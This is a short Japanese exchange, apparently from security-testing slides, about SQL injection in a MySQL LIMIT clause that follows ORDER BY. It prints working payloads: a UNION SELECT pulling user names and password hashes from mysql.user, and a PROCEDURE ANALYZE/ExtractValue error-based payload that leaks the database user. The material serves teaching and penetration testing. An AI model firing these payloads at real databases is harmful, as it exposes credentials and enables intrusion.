12. LIMIT 1 UNION ALL SELECT User, Password
FROM mysql.user;
診断で困ってます。MySQLの複数行クエリ無効時に
以下のLIMIT句でSQLインジェクションは可能ですか?
SELECT title, content FROM posts
ORDER BY date DESC
LIMIT $INJECTION;
それなら、普通に UNION が使えませんか?
13. それが、直前に ORDER BY があるので
UNION は使えないんです。
LIMIT 1 PROCEDURE ANALYZE
(ExtractValue(1,concat(0x2c,user())),1) ;
だったら、PROCEDURE ANALYZEはどうでしょう?
で、できました!ありがとうございます!